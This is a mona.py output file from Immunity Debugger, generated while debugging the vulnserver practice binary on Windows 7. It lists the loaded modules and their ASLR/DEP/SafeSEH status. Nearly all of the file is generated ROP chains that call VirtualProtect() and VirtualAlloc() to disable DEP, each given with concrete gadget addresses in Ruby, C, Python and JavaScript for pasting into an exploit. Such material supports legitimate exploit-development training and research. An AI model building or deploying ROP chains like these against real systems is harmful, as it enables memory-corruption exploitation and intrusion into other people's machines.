================================================================================
  Output generated by mona.py v2.0, rev 600 - Immunity Debugger
  Corelan Team - https://www.corelan.be
================================================================================
  OS : 7, release 6.1.7601
  Process being debugged : vulnserver (pid 4012)
  Current mona arguments: rop -m *.dll -cp nonull
================================================================================
  2020-03-02 11:42:33
================================================================================
-----------------------------------------------------------------------------------------------------------------------------------------
 Module info :
-----------------------------------------------------------------------------------------------------------------------------------------
 Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
-----------------------------------------------------------------------------------------------------------------------------------------
 0x75550000 | 0x7555a000 | 0x0000a000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [LPK.dll] (C:\Windows\system32\LPK.dll)
 0x762a0000 | 0x762a6000 | 0x00006000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [NSI.dll] (C:\Windows\system32\NSI.dll)
 0x62500000 | 0x62508000 | 0x00008000 | False  | False   | False |  False   | False  | -1.0- [essfunc.dll] (C:\Users\ctlister\Downloads\essfunc.dll)
 0x76cd0000 | 0x76d9c000 | 0x000cc000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [MSCTF.dll] (C:\Windows\system32\MSCTF.dll)
 0x74f90000 | 0x74fda000 | 0x0004a000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [KERNELBASE.dll] (C:\Windows\system32\KERNELBASE.dll)
 0x74930000 | 0x7496c000 | 0x0003c000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [mswsock.dll] (C:\Windows\system32\mswsock.dll)
 0x76200000 | 0x7629d000 | 0x0009d000 | True   | True    | True  |  True    | True   | 1.0626.7601.17514 [USP10.dll] (C:\Windows\system32\USP10.dll)
 0x76590000 | 0x765de000 | 0x0004e000 | True   | True    | True  |  True    | True   | 6.1.7601.17514 [GDI32.dll] (C:\Windows\system32\GDI32.dll)
 0x00400000 | 0x00407000 | 0x00007000 | False  | False   | False |  False   | False  | -1.0- [vulnserver.exe] (C:\Users\ctlister\Downloads\vulnserver.exe)
 0x76620000 | 0x766f4000 | 0x000d4000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [kernel32.dll] (C:\Windows\system32\kernel32.dll)
 0x75210000 | 0x752bc000 | 0x000ac000 | True   | True    | True  |  True    | True   | 7.0.7600.16385 [msvcrt.dll] (C:\Windows\system32\msvcrt.dll)
 0x76da0000 | 0x76edc000 | 0x0013c000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [ntdll.dll] (C:\Windows\SYSTEM32\ntdll.dll)
 0x753a0000 | 0x75441000 | 0x000a1000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [RPCRT4.dll] (C:\Windows\system32\RPCRT4.dll)
 0x765e0000 | 0x76615000 | 0x00035000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [WS2_32.DLL] (C:\Windows\system32\WS2_32.DLL)
 0x76c00000 | 0x76cc9000 | 0x000c9000 | True   | True    | True  |  True    | True   | 6.1.7601.17514 [user32.dll] (C:\Windows\system32\user32.dll)
 0x751f0000 | 0x7520f000 | 0x0001f000 | True   | True    | True  |  True    | True   | 6.1.7601.17514 [IMM32.DLL] (C:\Windows\system32\IMM32.DLL)
-----------------------------------------------------------------------------------------------------------------------------------------

################################################################################

Register setup for VirtualProtect() :
--------------------------------------------
 EAX = NOP (0x90909090)
 ECX = lpOldProtect (ptr to W address)
 EDX = NewProtect (0x40)
 EBX = dwSize
 ESP = lPAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualProtect()
 EDI = ROP NOP (RETN)
 --- alternative chain ---
 EAX = ptr to &VirtualProtect()
 ECX = lpOldProtect (ptr to W address)
 EDX = NewProtect (0x40)
 EBX = dwSize
 ESP = lPAddress (automatic)
 EBP = POP (skip 4 bytes)
 ESI = ptr to JMP [EAX]
 EDI = ROP NOP (RETN)
 + place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------


ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :
----------------------------------------------------------

*** [ Ruby ] ***

  def create_rop_chain()

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = 
    [
      #[---INFO:gadgets_to_set_esi:---]
      0x7526f022,  # POP ECX # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x6250609c,  # ptr to &VirtualProtect() [IAT essfunc.dll]
      0x76cefd52,  # MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_ebp:---]
      0x75263c03,  # POP EBP # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x625011bb,  # & jmp esp [essfunc.dll]
      #[---INFO:gadgets_to_set_ebx:---]
      0x7529fd06,  # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x76cd2fd0,  # NEG EAX # RETN [MSCTF.dll] ** REBASED ** ASLR 
      0x76cef9f1,  # XCHG EAX,EBX # RETN [MSCTF.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_edx:---]
      0x752a3836,  # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x7542dae9,  # NEG EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR 
      0x74f91110,  # XCHG EAX,EDX # RETN [KERNELBASE.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_ecx:---]
      0x7542d9dd,  # POP ECX # RETN [RPCRT4.dll] ** REBASED ** ASLR 
      0x7625df17,  # &Writable location [USP10.dll] ** REBASED ** ASLR
      #[---INFO:gadgets_to_set_edi:---]
      0x752409db,  # POP EDI # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x753c1645,  # RETN (ROP NOP) [RPCRT4.dll] ** REBASED ** ASLR
      #[---INFO:gadgets_to_set_eax:---]
      0x75241cf2,  # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x90909090,  # nop
      #[---INFO:pushad:---]
      0x7664e180,  # PUSHAD # RETN [kernel32.dll] ** REBASED ** ASLR 
    ].flatten.pack("V*")

    return rop_gadgets

  end


  # Call the ROP chain generator inside the 'exploit' function :


  rop_chain = create_rop_chain()



*** [ C ] ***

  #define CREATE_ROP_CHAIN(name, ...) \
    int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
    unsigned int name[name##_length / sizeof(unsigned int)]; \
    create_rop_chain(name, ##__VA_ARGS__);

  int create_rop_chain(unsigned int *buf, unsigned int )
  {
    // rop chain generated with mona.py - www.corelan.be
    unsigned int rop_gadgets[] = {
      //[---INFO:gadgets_to_set_esi:---]
      0x7526f022,  // POP ECX // RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x6250609c,  // ptr to &VirtualProtect() [IAT essfunc.dll]
      0x76cefd52,  // MOV ESI,DWORD PTR DS:[ECX] // ADD DH,DH // RETN [MSCTF.dll] ** REBASED ** ASLR 
      //[---INFO:gadgets_to_set_ebp:---]
      0x75263c03,  // POP EBP // RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x625011bb,  // & jmp esp [essfunc.dll]
      //[---INFO:gadgets_to_set_ebx:---]
      0x7529fd06,  // POP EAX // RETN [msvcrt.dll] ** REBASED ** ASLR 
      0xfffffdff,  // Value to negate, will become 0x00000201
      0x76cd2fd0,  // NEG EAX // RETN [MSCTF.dll] ** REBASED ** ASLR 
      0x76cef9f1,  // XCHG EAX,EBX // RETN [MSCTF.dll] ** REBASED ** ASLR 
      //[---INFO:gadgets_to_set_edx:---]
      0x752a3836,  // POP EAX // RETN [msvcrt.dll] ** REBASED ** ASLR 
      0xffffffc0,  // Value to negate, will become 0x00000040
      0x7542dae9,  // NEG EAX // RETN [RPCRT4.dll] ** REBASED ** ASLR 
      0x74f91110,  // XCHG EAX,EDX // RETN [KERNELBASE.dll] ** REBASED ** ASLR 
      //[---INFO:gadgets_to_set_ecx:---]
      0x7542d9dd,  // POP ECX // RETN [RPCRT4.dll] ** REBASED ** ASLR 
      0x7625df17,  // &Writable location [USP10.dll] ** REBASED ** ASLR
      //[---INFO:gadgets_to_set_edi:---]
      0x752409db,  // POP EDI // RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x753c1645,  // RETN (ROP NOP) [RPCRT4.dll] ** REBASED ** ASLR
      //[---INFO:gadgets_to_set_eax:---]
      0x75241cf2,  // POP EAX // RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x90909090,  // nop
      //[---INFO:pushad:---]
      0x7664e180,  // PUSHAD // RETN [kernel32.dll] ** REBASED ** ASLR 
    };
    if(buf != NULL) {
      memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
    };
    return sizeof(rop_gadgets);
  }

  // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  CREATE_ROP_CHAIN(rop_chain, );
  // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  // unsigned int rop_chain[256];
  // int rop_chain_length = create_rop_chain(rop_chain, );

*** [ Python ] ***

  def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      #[---INFO:gadgets_to_set_esi:---]
      0x7526f022,  # POP ECX # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x6250609c,  # ptr to &VirtualProtect() [IAT essfunc.dll]
      0x76cefd52,  # MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_ebp:---]
      0x75263c03,  # POP EBP # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x625011bb,  # & jmp esp [essfunc.dll]
      #[---INFO:gadgets_to_set_ebx:---]
      0x7529fd06,  # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x76cd2fd0,  # NEG EAX # RETN [MSCTF.dll] ** REBASED ** ASLR 
      0x76cef9f1,  # XCHG EAX,EBX # RETN [MSCTF.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_edx:---]
      0x752a3836,  # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x7542dae9,  # NEG EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR 
      0x74f91110,  # XCHG EAX,EDX # RETN [KERNELBASE.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_ecx:---]
      0x7542d9dd,  # POP ECX # RETN [RPCRT4.dll] ** REBASED ** ASLR 
      0x7625df17,  # &Writable location [USP10.dll] ** REBASED ** ASLR
      #[---INFO:gadgets_to_set_edi:---]
      0x752409db,  # POP EDI # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x753c1645,  # RETN (ROP NOP) [RPCRT4.dll] ** REBASED ** ASLR
      #[---INFO:gadgets_to_set_eax:---]
      0x75241cf2,  # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x90909090,  # nop
      #[---INFO:pushad:---]
      0x7664e180,  # PUSHAD # RETN [kernel32.dll] ** REBASED ** ASLR 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

  rop_chain = create_rop_chain()



*** [ JavaScript ] ***

  //rop chain generated with mona.py - www.corelan.be
  rop_gadgets = unescape(
    "" + // #[---INFO:gadgets_to_set_esi:---] : 
    "%uf022%u7526" + // 0x7526f022 : ,# POP ECX # RETN [msvcrt.dll] ** REBASED ** ASLR 
    "%u609c%u6250" + // 0x6250609c : ,# ptr to &VirtualProtect() [IAT essfunc.dll]
    "%ufd52%u76ce" + // 0x76cefd52 : ,# MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.dll] ** REBASED ** ASLR 
    "" + // #[---INFO:gadgets_to_set_ebp:---] : 
    "%u3c03%u7526" + // 0x75263c03 : ,# POP EBP # RETN [msvcrt.dll] ** REBASED ** ASLR 
    "%u11bb%u6250" + // 0x625011bb : ,# & jmp esp [essfunc.dll]
    "" + // #[---INFO:gadgets_to_set_ebx:---] : 
    "%ufd06%u7529" + // 0x7529fd06 : ,# POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 
    "%ufdff%uffff" + // 0xfffffdff : ,# Value to negate, will become 0x00000201
    "%u2fd0%u76cd" + // 0x76cd2fd0 : ,# NEG EAX # RETN [MSCTF.dll] ** REBASED ** ASLR 
    "%uf9f1%u76ce" + // 0x76cef9f1 : ,# XCHG EAX,EBX # RETN [MSCTF.dll] ** REBASED ** ASLR 
    "" + // #[---INFO:gadgets_to_set_edx:---] : 
    "%u3836%u752a" + // 0x752a3836 : ,# POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 
    "%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040
    "%udae9%u7542" + // 0x7542dae9 : ,# NEG EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR 
    "%u1110%u74f9" + // 0x74f91110 : ,# XCHG EAX,EDX # RETN [KERNELBASE.dll] ** REBASED ** ASLR 
    "" + // #[---INFO:gadgets_to_set_ecx:---] : 
    "%ud9dd%u7542" + // 0x7542d9dd : ,# POP ECX # RETN [RPCRT4.dll] ** REBASED ** ASLR 
    "%udf17%u7625" + // 0x7625df17 : ,# &Writable location [USP10.dll] ** REBASED ** ASLR
    "" + // #[---INFO:gadgets_to_set_edi:---] : 
    "%u09db%u7524" + // 0x752409db : ,# POP EDI # RETN [msvcrt.dll] ** REBASED ** ASLR 
    "%u1645%u753c" + // 0x753c1645 : ,# RETN (ROP NOP) [RPCRT4.dll] ** REBASED ** ASLR
    "" + // #[---INFO:gadgets_to_set_eax:---] : 
    "%u1cf2%u7524" + // 0x75241cf2 : ,# POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 
    "%u9090%u9090" + // 0x90909090 : ,# nop
    "" + // #[---INFO:pushad:---] : 
    "%ue180%u7664" + // 0x7664e180 : ,# PUSHAD # RETN [kernel32.dll] ** REBASED ** ASLR 
    ""); //  : 


--------------------------------------------------------------------------------------------------


################################################################################

Register setup for VirtualAlloc() :
--------------------------------------------
 EAX = NOP (0x90909090)
 ECX = flProtect (0x40)
 EDX = flAllocationType (0x1000)
 EBX = dwSize
 ESP = lpAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualAlloc()
 EDI = ROP NOP (RETN)
 --- alternative chain ---
 EAX = ptr to &VirtualAlloc()
 ECX = flProtect (0x40)
 EDX = flAllocationType (0x1000)
 EBX = dwSize
 ESP = lpAddress (automatic)
 EBP = POP (skip 4 bytes)
 ESI = ptr to JMP [EAX]
 EDI = ROP NOP (RETN)
 + place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------


ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] :
--------------------------------------------------------

*** [ Ruby ] ***

  def create_rop_chain()

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = 
    [
      #[---INFO:gadgets_to_set_esi:---]
      0x7523d479,  # POP ECX # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x76621818,  # ptr to &VirtualAlloc() [IAT kernel32.dll] ** REBASED ** ASLR
      0x76cefd52,  # MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_ebp:---]
      0x7526a6fc,  # POP EBP # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x762a2273,  # & jmp esp [NSI.dll] ** REBASED ** ASLR
      #[---INFO:gadgets_to_set_ebx:---]
      0x7524aeba,  # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0xffffffff,  # Value to negate, will become 0x00000001
      0x7542bd12,  # NEG EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR 
      0x76cef9f1,  # XCHG EAX,EBX # RETN [MSCTF.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_edx:---]
      0x766c784c,  # POP EAX # RETN [kernel32.dll] ** REBASED ** ASLR 
      0xa2800fc0,  # put delta into eax (-> put 0x00001000 into edx)
      0x766c7803,  # ADD EAX,5D800040 # RETN 0x08 [kernel32.dll] ** REBASED ** ASLR 
      0x76dd6d70,  # XCHG EAX,EDX # RETN [ntdll.dll] ** REBASED ** ASLR 
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      #[---INFO:gadgets_to_set_ecx:---]
      0x625011f0,  # POP EAX # RETN [essfunc.dll] 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x753c1643,  # NEG EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR 
      0x76208bcf,  # XCHG EAX,ECX # RETN [USP10.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_edi:---]
      0x74fa3179,  # POP EDI # RETN [KERNELBASE.dll] ** REBASED ** ASLR 
      0x753c1645,  # RETN (ROP NOP) [RPCRT4.dll] ** REBASED ** ASLR
      #[---INFO:gadgets_to_set_eax:---]
      0x75265da8,  # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x90909090,  # nop
      #[---INFO:pushad:---]
      0x76dc27c4,  # PUSHAD # RETN [ntdll.dll] ** REBASED ** ASLR 
    ].flatten.pack("V*")

    return rop_gadgets

  end


  # Call the ROP chain generator inside the 'exploit' function :


  rop_chain = create_rop_chain()



*** [ C ] ***

  #define CREATE_ROP_CHAIN(name, ...) \
    int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
    unsigned int name[name##_length / sizeof(unsigned int)]; \
    create_rop_chain(name, ##__VA_ARGS__);

  int create_rop_chain(unsigned int *buf, unsigned int )
  {
    // rop chain generated with mona.py - www.corelan.be
    unsigned int rop_gadgets[] = {
      //[---INFO:gadgets_to_set_esi:---]
      0x7523d479,  // POP ECX // RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x76621818,  // ptr to &VirtualAlloc() [IAT kernel32.dll] ** REBASED ** ASLR
      0x76cefd52,  // MOV ESI,DWORD PTR DS:[ECX] // ADD DH,DH // RETN [MSCTF.dll] ** REBASED ** ASLR 
      //[---INFO:gadgets_to_set_ebp:---]
      0x7526a6fc,  // POP EBP // RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x762a2273,  // & jmp esp [NSI.dll] ** REBASED ** ASLR
      //[---INFO:gadgets_to_set_ebx:---]
      0x7524aeba,  // POP EAX // RETN [msvcrt.dll] ** REBASED ** ASLR 
      0xffffffff,  // Value to negate, will become 0x00000001
      0x7542bd12,  // NEG EAX // RETN [RPCRT4.dll] ** REBASED ** ASLR 
      0x76cef9f1,  // XCHG EAX,EBX // RETN [MSCTF.dll] ** REBASED ** ASLR 
      //[---INFO:gadgets_to_set_edx:---]
      0x766c784c,  // POP EAX // RETN [kernel32.dll] ** REBASED ** ASLR 
      0xa2800fc0,  // put delta into eax (-> put 0x00001000 into edx)
      0x766c7803,  // ADD EAX,5D800040 // RETN 0x08 [kernel32.dll] ** REBASED ** ASLR 
      0x76dd6d70,  // XCHG EAX,EDX // RETN [ntdll.dll] ** REBASED ** ASLR 
      0x41414141,  // Filler (RETN offset compensation)
      0x41414141,  // Filler (RETN offset compensation)
      //[---INFO:gadgets_to_set_ecx:---]
      0x625011f0,  // POP EAX // RETN [essfunc.dll] 
      0xffffffc0,  // Value to negate, will become 0x00000040
      0x753c1643,  // NEG EAX // RETN [RPCRT4.dll] ** REBASED ** ASLR 
      0x76208bcf,  // XCHG EAX,ECX // RETN [USP10.dll] ** REBASED ** ASLR 
      //[---INFO:gadgets_to_set_edi:---]
      0x74fa3179,  // POP EDI // RETN [KERNELBASE.dll] ** REBASED ** ASLR 
      0x753c1645,  // RETN (ROP NOP) [RPCRT4.dll] ** REBASED ** ASLR
      //[---INFO:gadgets_to_set_eax:---]
      0x75265da8,  // POP EAX // RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x90909090,  // nop
      //[---INFO:pushad:---]
      0x76dc27c4,  // PUSHAD // RETN [ntdll.dll] ** REBASED ** ASLR 
    };
    if(buf != NULL) {
      memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
    };
    return sizeof(rop_gadgets);
  }

  // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  CREATE_ROP_CHAIN(rop_chain, );
  // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  // unsigned int rop_chain[256];
  // int rop_chain_length = create_rop_chain(rop_chain, );

*** [ Python ] ***

  def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      #[---INFO:gadgets_to_set_esi:---]
      0x7523d479,  # POP ECX # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x76621818,  # ptr to &VirtualAlloc() [IAT kernel32.dll] ** REBASED ** ASLR
      0x76cefd52,  # MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_ebp:---]
      0x7526a6fc,  # POP EBP # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x762a2273,  # & jmp esp [NSI.dll] ** REBASED ** ASLR
      #[---INFO:gadgets_to_set_ebx:---]
      0x7524aeba,  # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0xffffffff,  # Value to negate, will become 0x00000001
      0x7542bd12,  # NEG EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR 
      0x76cef9f1,  # XCHG EAX,EBX # RETN [MSCTF.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_edx:---]
      0x766c784c,  # POP EAX # RETN [kernel32.dll] ** REBASED ** ASLR 
      0xa2800fc0,  # put delta into eax (-> put 0x00001000 into edx)
      0x766c7803,  # ADD EAX,5D800040 # RETN 0x08 [kernel32.dll] ** REBASED ** ASLR 
      0x76dd6d70,  # XCHG EAX,EDX # RETN [ntdll.dll] ** REBASED ** ASLR 
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      #[---INFO:gadgets_to_set_ecx:---]
      0x625011f0,  # POP EAX # RETN [essfunc.dll] 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x753c1643,  # NEG EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR 
      0x76208bcf,  # XCHG EAX,ECX # RETN [USP10.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_edi:---]
      0x74fa3179,  # POP EDI # RETN [KERNELBASE.dll] ** REBASED ** ASLR 
      0x753c1645,  # RETN (ROP NOP) [RPCRT4.dll] ** REBASED ** ASLR
      #[---INFO:gadgets_to_set_eax:---]
      0x75265da8,  # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 
      0x90909090,  # nop
      #[---INFO:pushad:---]
      0x76dc27c4,  # PUSHAD # RETN [ntdll.dll] ** REBASED ** ASLR 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

  rop_chain = create_rop_chain()



*** [ JavaScript ] ***

  //rop chain generated with mona.py - www.corelan.be
  rop_gadgets = unescape(
    "" + // #[---INFO:gadgets_to_set_esi:---] : 
    "%ud479%u7523" + // 0x7523d479 : ,# POP ECX # RETN [msvcrt.dll] ** REBASED ** ASLR 
    "%u1818%u7662" + // 0x76621818 : ,# ptr to &VirtualAlloc() [IAT kernel32.dll] ** REBASED ** ASLR
    "%ufd52%u76ce" + // 0x76cefd52 : ,# MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.dll] ** REBASED ** ASLR 
    "" + // #[---INFO:gadgets_to_set_ebp:---] : 
    "%ua6fc%u7526" + // 0x7526a6fc : ,# POP EBP # RETN [msvcrt.dll] ** REBASED ** ASLR 
    "%u2273%u762a" + // 0x762a2273 : ,# & jmp esp [NSI.dll] ** REBASED ** ASLR
    "" + // #[---INFO:gadgets_to_set_ebx:---] : 
    "%uaeba%u7524" + // 0x7524aeba : ,# POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 
    "%uffff%uffff" + // 0xffffffff : ,# Value to negate, will become 0x00000001
    "%ubd12%u7542" + // 0x7542bd12 : ,# NEG EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR 
    "%uf9f1%u76ce" + // 0x76cef9f1 : ,# XCHG EAX,EBX # RETN [MSCTF.dll] ** REBASED ** ASLR 
    "" + // #[---INFO:gadgets_to_set_edx:---] : 
    "%u784c%u766c" + // 0x766c784c : ,# POP EAX # RETN [kernel32.dll] ** REBASED ** ASLR 
    "%u0fc0%ua280" + // 0xa2800fc0 : ,# put delta into eax (-> put 0x00001000 into edx)
    "%u7803%u766c" + // 0x766c7803 : ,# ADD EAX,5D800040 # RETN 0x08 [kernel32.dll] ** REBASED ** ASLR 
    "%u6d70%u76dd" + // 0x76dd6d70 : ,# XCHG EAX,EDX # RETN [ntdll.dll] ** REBASED ** ASLR 
    "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
    "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
    "" + // #[---INFO:gadgets_to_set_ecx:---] : 
    "%u11f0%u6250" + // 0x625011f0 : ,# POP EAX # RETN [essfunc.dll] 
    "%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040
    "%u1643%u753c" + // 0x753c1643 : ,# NEG EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR 
    "%u8bcf%u7620" + // 0x76208bcf : ,# XCHG EAX,ECX # RETN [USP10.dll] ** REBASED ** ASLR 
    "" + // #[---INFO:gadgets_to_set_edi:---] : 
    "%u3179%u74fa" + // 0x74fa3179 : ,# POP EDI # RETN [KERNELBASE.dll] ** REBASED ** ASLR 
    "%u1645%u753c" + // 0x753c1645 : ,# RETN (ROP NOP) [RPCRT4.dll] ** REBASED ** ASLR
    "" + // #[---INFO:gadgets_to_set_eax:---] : 
    "%u5da8%u7526" + // 0x75265da8 : ,# POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 
    "%u9090%u9090" + // 0x90909090 : ,# nop
    "" + // #[---INFO:pushad:---] : 
    "%u27c4%u76dc" + // 0x76dc27c4 : ,# PUSHAD # RETN [ntdll.dll] ** REBASED ** ASLR 
    ""); //  : 


--------------------------------------------------------------------------------------------------

